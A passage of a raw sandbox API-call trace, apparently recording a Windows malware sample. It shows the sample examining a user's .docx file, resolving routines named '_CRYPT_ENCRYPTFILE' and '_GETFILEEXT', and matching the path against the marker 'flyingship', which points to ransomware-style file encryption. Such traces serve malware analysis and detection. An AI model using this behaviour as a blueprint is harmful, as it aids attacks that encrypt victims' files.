hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0175.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0175.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.289] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.290] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0175.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd9f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0175.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.291] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0175.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0175.291] CloseHandle (hObject=0x120) returned 1 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0175.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0175.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0175.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.292] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0175.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.293] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0175.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0175.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0175.293] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0175.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0175.293] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0175.293] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0175.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.293] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0175.293] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.294] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.294] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.294] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.294] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace342c0, ftCreationTime.dwHighDateTime=0x1d5bd3c, ftLastAccessTime.dwLowDateTime=0xdfb517b0, ftLastAccessTime.dwHighDateTime=0x1d5e261, ftLastWriteTime.dwLowDateTime=0xdfb517b0, ftLastWriteTime.dwHighDateTime=0x1d5e261, nFileSizeHigh=0x0, nFileSizeLow=0x15694, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="NqZsz9XCQqe D7p.docx", cAlternateFileName="NQZSZ9~1.DOC")) returned 0x90add8 [0175.296] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0175.296] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.296] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace342c0, ftCreationTime.dwHighDateTime=0x1d5bd3c, ftLastAccessTime.dwLowDateTime=0xdfb517b0, ftLastAccessTime.dwHighDateTime=0x1d5e261, ftLastWriteTime.dwLowDateTime=0xdfb517b0, ftLastWriteTime.dwHighDateTime=0x1d5e261, nFileSizeHigh=0x0, nFileSizeLow=0x15694, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="NqZsz9XCQqe D7p.docx", cAlternateFileName="NQZSZ9~1.DOC")) returned 0x90add8 [0175.297] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0175.297] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NqZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qZsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zsz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sz9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XCQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CQqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qqe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qe D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" D7p.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.299] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.299] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0175.299] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0175.299] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.299] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.299] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.299] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.299] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, 